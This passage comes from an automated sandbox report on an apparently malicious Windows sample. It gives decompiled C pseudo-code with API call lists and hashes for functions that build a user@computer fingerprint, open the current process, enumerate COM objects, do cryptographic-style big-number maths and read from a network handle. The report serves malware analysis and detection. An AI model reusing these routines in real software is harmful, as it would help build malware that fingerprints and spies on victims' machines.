                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                                          • String ID: ($\
                                                          • API String ID: 3924217599-1512714803
                                                          • Opcode ID: 93930979b5b04748e0f5c8e4afebb722cb9965de516eeac5f60890b599f02629
                                                          • Instruction ID: 3ed54d65781de12f69e68aa851039f38fc06f2d53f6616dcf23cabac58a77b90
                                                          • Opcode Fuzzy Hash: 93930979b5b04748e0f5c8e4afebb722cb9965de516eeac5f60890b599f02629
                                                          • Instruction Fuzzy Hash: 1251697250020AEFCF22AF60DE40EAA7BBAFF05384F1085A9F91597120D73AD925DF10
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E02B9A199() {
                                                          				long _v8;
                                                          				long _v12;
                                                          				int _v16;
                                                          				long _t39;
                                                          				long _t43;
                                                          				signed int _t47;
                                                          				short _t51;
                                                          				signed int _t52;
                                                          				int _t56;
                                                          				int _t57;
                                                          				char* _t64;
                                                          				short* _t67;
                                                          
                                                          				_v16 = 0;
                                                          				_v8 = 0;
                                                          				GetUserNameW(0,  &_v8);
                                                          				_t39 = _v8;
                                                          				if(_t39 != 0) {
                                                          					_v12 = _t39;
                                                          					_v8 = 0;
                                                          					GetComputerNameW(0,  &_v8);
                                                          					_t43 = _v8;
                                                          					if(_t43 != 0) {
                                                          						_v12 = _v12 + _t43 + 2;
                                                          						_t64 = E02B9A71F(_v12 + _t43 + 2 << 2);
                                                          						if(_t64 != 0) {
                                                          							_t47 = _v12;
                                                          							_t67 = _t64 + _t47 * 2;
                                                          							_v8 = _t47;
                                                          							if(GetUserNameW(_t67,  &_v8) == 0) {
                                                          								L7:
                                                          								E02B9A734(_t64);
                                                          							} else {
                                                          								_t51 = 0x40;
                                                          								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
                                                          								_t52 = _v8;
                                                          								_v12 = _v12 - _t52;
                                                          								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
                                                          									goto L7;
                                                          								} else {
                                                          									_t56 = _v12 + _v8;
                                                          									_t31 = _t56 + 2; // 0x2b91fd4
                                                          									_v12 = _t56;
                                                          									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
                                                          									_v8 = _t57;
                                                          									if(_t57 == 0) {
                                                          										goto L7;
                                                          									} else {
                                                          										_t64[_t57] = 0;
                                                          										_v16 = _t64;
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          				return _v16;
                                                          			}

                                                          APIs
                                                          • GetUserNameW.ADVAPI32(00000000,02B91FD2), ref: 02B9A1AD
                                                          • GetComputerNameW.KERNEL32(00000000,02B91FD2), ref: 02B9A1C9
                                                            • Part of subcall function 02B9A71F: RtlAllocateHeap.NTDLL(00000000,00000000,02B95595), ref: 02B9A72B
                                                          • GetUserNameW.ADVAPI32(00000000,02B91FD2), ref: 02B9A203
                                                          • GetComputerNameW.KERNEL32(02B91FD2,?), ref: 02B9A226
                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,02B91FD2,00000000,02B91FD4,00000000,00000000,?,?,02B91FD2), ref: 02B9A249
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                                          • String ID:
                                                          • API String ID: 3850880919-0
                                                          • Opcode ID: 985c8d9775e0c2958ec6dd13f1ebea6e4805b39ec1efc18d06877d0eafa728f3
                                                          • Instruction ID: d156d8ebcb16e3582ed629d4cf28cef20b1088ffbc32b21bdd1aa6f8f062ad74
                                                          • Opcode Fuzzy Hash: 985c8d9775e0c2958ec6dd13f1ebea6e4805b39ec1efc18d06877d0eafa728f3
                                                          • Instruction Fuzzy Hash: A621F776901208FFCB11DFE9C9848EEBBB9EF48744B6044AAE501E7240E7359B14DB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 58%
                                                          			E02B93DE9(void* __eax, intOrPtr _a4, intOrPtr _a8) {
                                                          				void* __esi;
                                                          				long _t10;
                                                          				void* _t18;
                                                          				void* _t22;
                                                          
                                                          				_t9 = __eax;
                                                          				_t22 = __eax;
                                                          				if(_a4 != 0 && E02B95AF1(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
                                                          					L9:
                                                          					return GetLastError();
                                                          				}
                                                          				_t10 = E02B9A81C(_t9, _t18, _t22, _a8);
                                                          				if(_t10 == 0) {
                                                          					ResetEvent( *(_t22 + 0x1c));
                                                          					ResetEvent( *(_t22 + 0x20));
                                                          					_push(0);
                                                          					_push(0);
                                                          					_push(0xffffffff);
                                                          					_push(0);
                                                          					_push( *((intOrPtr*)(_t22 + 0x18)));
                                                          					if( *0x2b9d128() != 0) {
                                                          						SetEvent( *(_t22 + 0x1c));
                                                          						goto L7;
                                                          					} else {
                                                          						_t10 = GetLastError();
                                                          						if(_t10 == 0x3e5) {
                                                          							L7:
                                                          							_t10 = 0;
                                                          						}
                                                          					}
                                                          				}
                                                          				if(_t10 == 0xffffffff) {
                                                          					goto L9;
                                                          				}
                                                          				return _t10;
                                                          			}

                                                          APIs
                                                          • ResetEvent.KERNEL32(?,00000008,?,?,00000102,02B967B8,?,?,00000000,00000000), ref: 02B93E23
                                                          • ResetEvent.KERNEL32(?), ref: 02B93E28
                                                          • GetLastError.KERNEL32 ref: 02B93E40
                                                          • GetLastError.KERNEL32(?,?,00000102,02B967B8,?,?,00000000,00000000), ref: 02B93E5B
                                                            • Part of subcall function 02B95AF1: lstrlen.KERNEL32(00000000,00000008,?,74B04D40,?,?,02B93E08,?,?,?,?,00000102,02B967B8,?,?,00000000), ref: 02B95AFD
                                                            • Part of subcall function 02B95AF1: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,02B93E08,?,?,?,?,00000102,02B967B8,?), ref: 02B95B5B
                                                            • Part of subcall function 02B95AF1: lstrcpy.KERNEL32(00000000,00000000), ref: 02B95B6B
                                                          • SetEvent.KERNEL32(?), ref: 02B93E4E
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 1449191863-0
                                                          • Opcode ID: f7f6cec9f50e9a01c6bfc042be36b0b60f42c267cc9f281ba99b70e41ec65060
                                                          • Instruction ID: e1ecc7b3df1d18717a392e8a07522cda6ef2e77505ebb59580246eb087f97e1e
                                                          • Opcode Fuzzy Hash: f7f6cec9f50e9a01c6bfc042be36b0b60f42c267cc9f281ba99b70e41ec65060
                                                          • Instruction Fuzzy Hash: F201AD31104A01ABDE306B31DD88F1BBBE8EF48BA4F204AB5F551920E0C720E814DA74
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E02B93E69(intOrPtr _a4) {
                                                          				void* _t2;
                                                          				unsigned int _t4;
                                                          				void* _t5;
                                                          				long _t6;
                                                          				void* _t7;
                                                          				void* _t15;
                                                          
                                                          				_t2 = CreateEventA(0, 1, 0, 0);
                                                          				 *0x2b9d26c = _t2;
                                                          				if(_t2 == 0) {
                                                          					return GetLastError();
                                                          				}
                                                          				_t4 = GetVersion();
                                                          				if(_t4 != 5) {
                                                          					L4:
                                                          					if(_t15 <= 0) {
                                                          						_t5 = 0x32;
                                                          						return _t5;
                                                          					}
                                                          					L5:
                                                          					 *0x2b9d25c = _t4;
                                                          					_t6 = GetCurrentProcessId();
                                                          					 *0x2b9d258 = _t6;
                                                          					 *0x2b9d264 = _a4;
                                                          					_t7 = OpenProcess(0x10047a, 0, _t6);
                                                          					 *0x2b9d254 = _t7;
                                                          					if(_t7 == 0) {
                                                          						 *0x2b9d254 =  *0x2b9d254 | 0xffffffff;
                                                          					}
                                                          					return 0;
                                                          				}
                                                          				if(_t4 >> 8 > 0) {
                                                          					goto L5;
                                                          				}
                                                          				_t15 = _t4 - _t4;
                                                          				goto L4;
                                                          			}

                                                          APIs
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,02B9131F,?,?,00000001,?,?,?,02B94EF2,?), ref: 02B93E71
                                                          • GetVersion.KERNEL32(?,00000001,?,?,?,02B94EF2,?), ref: 02B93E80
                                                          • GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,02B94EF2,?), ref: 02B93E9C
                                                          • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,02B94EF2,?), ref: 02B93EB9
                                                          • GetLastError.KERNEL32(?,00000001,?,?,?,02B94EF2,?), ref: 02B93ED8
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                          • String ID:
                                                          • API String ID: 2270775618-0
                                                          • Opcode ID: 97c3ff802ae4e6f4bd8192d992f7d9810c4cb71fb906652d9f548a9f50571c3f
                                                          • Instruction ID: 81affefcf2482548886f0d7af5b3334d3546b70f00f6869b79fd25e9d5b679ba
                                                          • Opcode Fuzzy Hash: 97c3ff802ae4e6f4bd8192d992f7d9810c4cb71fb906652d9f548a9f50571c3f
                                                          • Instruction Fuzzy Hash: 90F04F70EC4742ABDB209B36EA19B193FA9E7887C1F100DA6E596C71C0D770C061CB35
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 46%
                                                          			E02B96F3A(intOrPtr* __eax) {
                                                          				void* _v8;
                                                          				WCHAR* _v12;
                                                          				void* _v16;
                                                          				char _v20;
                                                          				void* _v24;
                                                          				intOrPtr _v28;
                                                          				void* _v32;
                                                          				intOrPtr _v40;
                                                          				short _v48;
                                                          				intOrPtr _v56;
                                                          				short _v64;
                                                          				intOrPtr* _t54;
                                                          				intOrPtr* _t56;
                                                          				intOrPtr _t57;
                                                          				intOrPtr* _t58;
                                                          				intOrPtr* _t60;
                                                          				void* _t61;
                                                          				intOrPtr* _t63;
                                                          				intOrPtr* _t65;
                                                          				short _t67;
                                                          				intOrPtr* _t68;
                                                          				intOrPtr* _t70;
                                                          				intOrPtr* _t72;
                                                          				intOrPtr* _t75;
                                                          				intOrPtr* _t77;
                                                          				intOrPtr _t79;
                                                          				intOrPtr* _t83;
                                                          				intOrPtr* _t87;
                                                          				intOrPtr _t103;
                                                          				intOrPtr _t109;
                                                          				void* _t118;
                                                          				void* _t122;
                                                          				void* _t123;
                                                          				intOrPtr _t130;
                                                          
                                                          				_t123 = _t122 - 0x3c;
                                                          				_push( &_v8);
                                                          				_push(__eax);
                                                          				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
                                                          				if(_t118 >= 0) {
                                                          					_t54 = _v8;
                                                          					_t103 =  *0x2b9d2a8; // 0x3e1a5a8
                                                          					_t5 = _t103 + 0x2b9e038; // 0x3050f485
                                                          					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                                                          					_t56 = _v8;
                                                          					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                                                          					if(_t118 >= 0) {
                                                          						__imp__#2(0x2b9c290);
                                                          						_v28 = _t57;
                                                          						if(_t57 == 0) {
                                                          							_t118 = 0x8007000e;
                                                          						} else {
                                                          							_t60 = _v32;
                                                          							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                                                          							_t87 = __imp__#6;
                                                          							_t118 = _t61;
                                                          							if(_t118 >= 0) {
                                                          								_t63 = _v24;
                                                          								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                                                          								if(_t118 >= 0) {
                                                          									_t130 = _v20;
                                                          									if(_t130 != 0) {
                                                          										_t67 = 3;
                                                          										_v64 = _t67;
                                                          										_v48 = _t67;
                                                          										_v56 = 0;
                                                          										_v40 = 0;
                                                          										if(_t130 > 0) {
                                                          											while(1) {
                                                          												_t68 = _v24;
                                                          												asm("movsd");
                                                          												asm("movsd");
                                                          												asm("movsd");
                                                          												asm("movsd");
                                                          												_t123 = _t123;
                                                          												asm("movsd");
                                                          												asm("movsd");
                                                          												asm("movsd");
                                                          												asm("movsd");
                                                          												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
                                                          												if(_t118 < 0) {
                                                          													goto L16;
                                                          												}
                                                          												_t70 = _v8;
                                                          												_t109 =  *0x2b9d2a8; // 0x3e1a5a8
                                                          												_t28 = _t109 + 0x2b9e0bc; // 0x3050f1ff
                                                          												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
                                                          												if(_t118 >= 0) {
                                                          													_t75 = _v16;
                                                          													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
                                                          													if(_t118 >= 0 && _v12 != 0) {
                                                          														_t79 =  *0x2b9d2a8; // 0x3e1a5a8
                                                          														_t33 = _t79 + 0x2b9e078; // 0x76006f
                                                          														if(lstrcmpW(_v12, _t33) == 0) {
                                                          															_t83 = _v16;
                                                          															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
                                                          														}
                                                          														 *_t87(_v12);
                                                          													}
                                                          													_t77 = _v16;
                                                          													 *((intOrPtr*)( *_t77 + 8))(_t77);
                                                          												}
                                                          												_t72 = _v8;
                                                          												 *((intOrPtr*)( *_t72 + 8))(_t72);
                                                          												_v40 = _v40 + 1;
                                                          												if(_v40 < _v20) {
                                                          													continue;
                                                          												}
                                                          												goto L16;
                                                          											}
                                                          										}
                                                          									}
                                                          								}
                                                          								L16:
                                                          								_t65 = _v24;
                                                          								 *((intOrPtr*)( *_t65 + 8))(_t65);
                                                          							}
                                                          							 *_t87(_v28);
                                                          						}
                                                          						_t58 = _v32;
                                                          						 *((intOrPtr*)( *_t58 + 8))(_t58);
                                                          					}
                                                          				}
                                                          				return _t118;
                                                          			}

                                                          APIs
                                                          • SysAllocString.OLEAUT32(02B9C290), ref: 02B96F8A
                                                          • lstrcmpW.KERNEL32(00000000,0076006F), ref: 02B9706B
                                                          • SysFreeString.OLEAUT32(00000000), ref: 02B97084
                                                          • SysFreeString.OLEAUT32(?), ref: 02B970B3
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: String$Free$Alloclstrcmp
                                                          • String ID:
                                                          • API String ID: 1885612795-0
                                                          • Opcode ID: 039b4736d076dbcc92860797e3795aec7797c26e6ef20ba8c4f6c40c555d61ed
                                                          • Instruction ID: d809b48a5700b2914e27e1f7a19f94a98b91a702fb266de9d02a5e61b9f35cbb
                                                          • Opcode Fuzzy Hash: 039b4736d076dbcc92860797e3795aec7797c26e6ef20ba8c4f6c40c555d61ed
                                                          • Instruction Fuzzy Hash: 43513D75D00519EFCF10DFA8C888DAEF7BAEF89704B154599E915EB210DB329D41CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 85%
                                                          			E02B953C6(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                                                          				intOrPtr _v8;
                                                          				intOrPtr _v12;
                                                          				signed int _v16;
                                                          				void _v92;
                                                          				void _v236;
                                                          				void* _t55;
                                                          				unsigned int _t56;
                                                          				signed int _t66;
                                                          				signed int _t74;
                                                          				void* _t76;
                                                          				signed int _t79;
                                                          				void* _t81;
                                                          				void* _t92;
                                                          				void* _t96;
                                                          				signed int* _t99;
                                                          				signed int _t101;
                                                          				signed int _t103;
                                                          				void* _t107;
                                                          
                                                          				_t92 = _a12;
                                                          				_t101 = __eax;
                                                          				_t55 = E02B91AD1(_a16, _t92);
                                                          				_t79 = _t55;
                                                          				if(_t79 == 0) {
                                                          					L18:
                                                          					return _t55;
                                                          				}
                                                          				_t56 =  *(_t92 + _t79 * 4 - 4);
                                                          				_t81 = 0;
                                                          				_t96 = 0x20;
                                                          				if(_t56 == 0) {
                                                          					L4:
                                                          					_t97 = _t96 - _t81;
                                                          					_v12 = _t96 - _t81;
                                                          					E02B950FF(_t79,  &_v236);
                                                          					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E02B95745(_t101,  &_v236, _a8, _t96 - _t81);
                                                          					E02B95745(_t79,  &_v92, _a12, _t97);
                                                          					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
                                                          					_t66 = E02B950FF(_t101, 0x2b9d1b0);
                                                          					_t103 = _t101 - _t79;
                                                          					_a8 = _t103;
                                                          					if(_t103 < 0) {
                                                          						L17:
                                                          						E02B950FF(_a16, _a4);
                                                          						E02B95088(_t79,  &_v236, _a4, _t97);
                                                          						memset( &_v236, 0, 0x8c);
                                                          						_t55 = memset( &_v92, 0, 0x44);
                                                          						goto L18;
                                                          					}
                                                          					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
                                                          					do {
                                                          						if(_v8 != 0xffffffff) {
                                                          							_push(1);
                                                          							_push(0);
                                                          							_push(0);
                                                          							_push( *_t99);
                                                          							L02B9AF2E();
                                                          							_t74 = _t66 +  *(_t99 - 4);
                                                          							asm("adc edx, esi");
                                                          							_push(0);
                                                          							_push(_v8 + 1);
                                                          							_push(_t92);
                                                          							_push(_t74);
                                                          							L02B9AF28();
                                                          							if(_t92 > 0 || _t74 > 0xffffffff) {
                                                          								_t74 = _t74 | 0xffffffff;
                                                          								_v16 = _v16 & 0x00000000;
                                                          							}
                                                          						} else {
                                                          							_t74 =  *_t99;
                                                          						}
                                                          						_t106 = _t107 + _a8 * 4 - 0xe8;
                                                          						_a12 = _t74;
                                                          						_t76 = E02B95F21(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
                                                          						while(1) {
                                                          							 *_t99 =  *_t99 - _t76;
                                                          							if( *_t99 != 0) {
                                                          								goto L14;
                                                          							}
                                                          							L13:
                                                          							_t92 =  &_v92;
                                                          							if(E02B990C2(_t79, _t92, _t106) < 0) {
                                                          								break;
                                                          							}
                                                          							L14:
                                                          							_a12 = _a12 + 1;
                                                          							_t76 = E02B96044(_t79,  &_v92, _t106, _t106);
                                                          							 *_t99 =  *_t99 - _t76;
                                                          							if( *_t99 != 0) {
                                                          								goto L14;
                                                          							}
                                                          							goto L13;
                                                          						}
                                                          						_a8 = _a8 - 1;
                                                          						_t66 = _a12;
                                                          						_t99 = _t99 - 4;
                                                          						 *(0x2b9d1b0 + _a8 * 4) = _t66;
                                                          					} while (_a8 >= 0);
                                                          					_t97 = _v12;
                                                          					goto L17;
                                                          				}
                                                          				while(_t81 < _t96) {
                                                          					_t81 = _t81 + 1;
                                                          					_t56 = _t56 >> 1;
                                                          					if(_t56 != 0) {
                                                          						continue;
                                                          					}
                                                          					goto L4;
                                                          				}
                                                          				goto L4;
                                                          			}

                                                          APIs
                                                          • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 02B95473
                                                          • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 02B95489
                                                          • memset.NTDLL ref: 02B95529
                                                          • memset.NTDLL ref: 02B95539
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: memset$_allmul_aulldiv
                                                          • String ID:
                                                          • API String ID: 3041852380-0
                                                          • Opcode ID: 1b3208f0bae7891ea2b12efb9a03a5ed28cff0d68af8ab5c10783eeed3d1cc8d
                                                          • Instruction ID: 12e09fd0e78bfee6e4ba92fe3f06fb7a841f4559ae23d9a9014c24712402bac4
                                                          • Opcode Fuzzy Hash: 1b3208f0bae7891ea2b12efb9a03a5ed28cff0d68af8ab5c10783eeed3d1cc8d
                                                          • Instruction Fuzzy Hash: A441F431640209ABDF21DFA8CC80BDE7776EF45310F5085B9F91AA7284DB70AD458F90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlen.KERNEL32(?,00000008,74B04D40), ref: 02B9A82E
                                                            • Part of subcall function 02B9A71F: RtlAllocateHeap.NTDLL(00000000,00000000,02B95595), ref: 02B9A72B
                                                          • ResetEvent.KERNEL32(?), ref: 02B9A8A2
                                                          • GetLastError.KERNEL32 ref: 02B9A8C5
                                                          • GetLastError.KERNEL32 ref: 02B9A970
                                                            • Part of subcall function 02B9A734: HeapFree.KERNEL32(00000000,00000000,02B95637,00000000,?,?,00000000), ref: 02B9A740
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                                                          • String ID:
                                                          • API String ID: 943265810-0
                                                          • Opcode ID: bba1ff30351af9fe8baf04bcbcce574570c67b02c40928e297168b7004726d3e
                                                          • Instruction ID: 041bcfd544fd5974474a44692672866c71abfe1fd6b3d1c3d13d75dacc7efbf0
                                                          • Opcode Fuzzy Hash: bba1ff30351af9fe8baf04bcbcce574570c67b02c40928e297168b7004726d3e
                                                          • Instruction Fuzzy Hash: AB416F71940204BFDF31AFA2DD88E5B7BBDEB89744F104969F642D20A0E731A555CF20
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 42%
                                                          			E02B915FF(void* __eax, void* __ecx) {
                                                          				char _v8;
                                                          				void* _v12;
                                                          				intOrPtr _v16;
                                                          				char _v20;
                                                          				void* __esi;
                                                          				void* _t30;
                                                          				intOrPtr _t38;
                                                          				intOrPtr* _t39;
                                                          				intOrPtr* _t41;
                                                          				void* _t54;
                                                          				long _t64;
                                                          				void* _t67;
                                                          				void* _t69;
                                                          
                                                          				_t58 = __ecx;
                                                          				_t67 = __eax;
                                                          				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
                                                          					L2:
                                                          					_t30 = _t67;
                                                          					_pop(_t68);
                                                          					_t69 = _t30;
                                                          					_t64 = 0;
                                                          					ResetEvent( *(_t69 + 0x1c));
                                                          					_push( &_v8);
                                                          					_push(4);
                                                          					_push( &_v20);
                                                          					_push( *((intOrPtr*)(_t69 + 0x18)));
                                                          					if( *0x2b9d134() != 0) {
                                                          						L9:
                                                          						if(_v8 == 0) {
                                                          							 *((intOrPtr*)(_t69 + 0x30)) = 0;
                                                          						} else {
                                                          							 *0x2b9d164(0, 1,  &_v12);
                                                          							if(0 != 0) {
                                                          								_t64 = 8;
                                                          							} else {
                                                          								_t38 = E02B9A71F(0x1000);
                                                          								_v16 = _t38;
                                                          								if(_t38 == 0) {
                                                          									_t64 = 8;
                                                          								} else {
                                                          									_push(0);
                                                          									_push(_v8);
                                                          									_push( &_v20);
                                                          									while(1) {
                                                          										_t41 = _v12;
                                                          										_t61 =  *_t41;
                                                          										 *((intOrPtr*)( *_t41 + 0x10))(_t41);
                                                          										ResetEvent( *(_t69 + 0x1c));
                                                          										_push( &_v8);
                                                          										_push(0x1000);
                                                          										_push(_v16);
                                                          										_push( *((intOrPtr*)(_t69 + 0x18)));
                                                          										if( *0x2b9d134() != 0) {
                                                          											goto L17;
                                                          										}
                                                          										_t64 = GetLastError();
                                                          										if(_t64 == 0x3e5) {
                                                          											_t64 = E02B95646( *(_t69 + 0x1c), _t61, 0xffffffff);
                                                          											if(_t64 == 0) {
                                                          												_t64 =  *((intOrPtr*)(_t69 + 0x28));
                                                          												if(_t64 == 0) {
                                                          													goto L17;
                                                          												}
                                                          											}
                                                          										}
                                                          										L19:
                                                          										E02B9A734(_v16);
                                                          										if(_t64 == 0) {
                                                          											_t64 = E02B970CC(_v12, _t69);
                                                          										}
                                                          										goto L22;
                                                          										L17:
                                                          										_t64 = 0;
                                                          										if(_v8 != 0) {
                                                          											_push(0);
                                                          											_push(_v8);
                                                          											_push(_v16);
                                                          											continue;
                                                          										}
                                                          										goto L19;
                                                          									}
                                                          								}
                                                          								L22:
                                                          								_t39 = _v12;
                                                          								 *((intOrPtr*)( *_t39 + 8))(_t39);
                                                          							}
                                                          						}
                                                          					} else {
                                                          						_t64 = GetLastError();
                                                          						if(_t64 != 0x3e5) {
                                                          							L8:
                                                          							if(_t64 == 0) {
                                                          								goto L9;
                                                          							}
                                                          						} else {
                                                          							_t64 = E02B95646( *(_t69 + 0x1c), _t58, 0xffffffff);
                                                          							if(_t64 == 0) {
                                                          								_t64 =  *((intOrPtr*)(_t69 + 0x28));
                                                          								goto L8;
                                                          							}
                                                          						}
                                                          					}
                                                          					return _t64;
                                                          				} else {
                                                          					_t54 = E02B99242(__ecx, __eax);
                                                          					if(_t54 != 0) {
                                                          						return _t54;
                                                          					} else {
                                                          						goto L2;
                                                          					}
                                                          				}
                                                          			}

















                                                          APIs
                                                          • ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,00000000,00000000,74B481D0), ref: 02B918EE
                                                          • GetLastError.KERNEL32(?,?,?,00000000,74B481D0), ref: 02B91907
                                                          • ResetEvent.KERNEL32(?), ref: 02B91980
                                                          • GetLastError.KERNEL32 ref: 02B9199B
                                                            • Part of subcall function 02B99242: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74B481D0), ref: 02B99259
                                                            • Part of subcall function 02B99242: SetEvent.KERNEL32(?), ref: 02B99269
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Event$ErrorLastReset$ObjectSingleWait
                                                          • String ID:
                                                          • API String ID: 1123145548-0
                                                          • Opcode ID: f95e16fd09c1c50694882d7a548bf436c404239de1a20c8214feb47693b788a6
                                                          • Instruction ID: 72c30fd72703c826f7c37a2780317c1d242e77eb76ae668a150bbd143e9c7294
                                                          • Opcode Fuzzy Hash: f95e16fd09c1c50694882d7a548bf436c404239de1a20c8214feb47693b788a6
                                                          • Instruction Fuzzy Hash: 50411C36A50605AFCF21DFA9CD44BAE77B9EF84350F1005B5E65AD3150D730ED42AB10
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SysAllocString.OLEAUT32(80000002), ref: 02B93B0D
                                                          • SysAllocString.OLEAUT32(02B985ED), ref: 02B93B51
                                                          • SysFreeString.OLEAUT32(00000000), ref: 02B93B65
                                                          • SysFreeString.OLEAUT32(00000000), ref: 02B93B73
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp
